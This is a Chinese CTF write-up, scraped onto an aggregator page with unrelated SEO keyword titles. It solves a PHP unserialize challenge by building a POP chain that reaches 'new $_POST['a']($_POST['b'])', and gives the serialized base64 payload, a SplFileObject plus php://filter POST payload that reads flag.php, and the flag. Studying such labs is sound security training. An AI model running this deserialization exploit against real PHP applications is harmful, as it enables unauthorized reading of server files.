当前位置: 首页> 房产> 市场 > 微信公共平台开发_网站如何建立快捷方式_网站友情链接检测_百度商城app

微信公共平台开发_网站如何建立快捷方式_网站友情链接检测_百度商城app

时间:2025/7/11 18:45:10来源:https://blog.csdn.net/2301_80218721/article/details/146703761 浏览次数:0次
微信公共平台开发_网站如何建立快捷方式_网站友情链接检测_百度商城app

打开题目在线环境,可以看到php代码:

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary = 10000){$this->name = $name;$this->rank = $rank;$this->salary = $salary;}
}class classroom{public $name;public $leader;public function __construct($name,$leader){$this->name = $name;$this->leader = $leader;}public function hahaha(){if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){return False;}else{return True;}}
}class school{public $department;public $headmaster;public function __construct($department,$ceo){$this->department = $department;$this->headmaster = $ceo;}public function IPO(){if($this->headmaster == 'ong'){echo "Pretty Good ! Ctfer!\n";echo new $_POST['a']($_POST['b']);}}public function __wakeup(){if($this->department->hahaha()) {$this->IPO();}}
}if(isset($_GET['d'])){unserialize(base64_decode($_GET['d']));
}
?>

审计代码,flag在flag.php里面,想到要用伪协议去读取,又因为看到echo new POST[′a′](POST ′a′; 这个形式可以想到利用原生类(做的时候没想到,看了官方的wp才知道),所以,反序列化部分:

<?php
error_reporting(0);
class teacher{public $name;public $rank;public function __construct(){$this->name = 'ing';$this->rank = 'department';}
}class classroom{public $name;public $leader;public function __construct(){$this->name = 'one class';$this->leader = new teacher;}
}class school{public $department;public $headmaster;public function __construct(){$this->department = new classroom;$this->headmaster = 'ong';}
}
$a = new school;
echo base64_encode(serialize($a));

GET:Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjoyOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO319czoxMDoiaGVhZG1hc3RlciI7czozOiJvbmciO30=
伪协议部分:
POST:a=SplFileObject&b=php://filter/convert.base64-encode/resource=flag.php
就能得到base64加密过后的flag
在这里插入图片描述
NSSCTF{a041be45-2bd0-4035-a334-37a9337830e4}

关键字:微信公共平台开发_网站如何建立快捷方式_网站友情链接检测_百度商城app

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: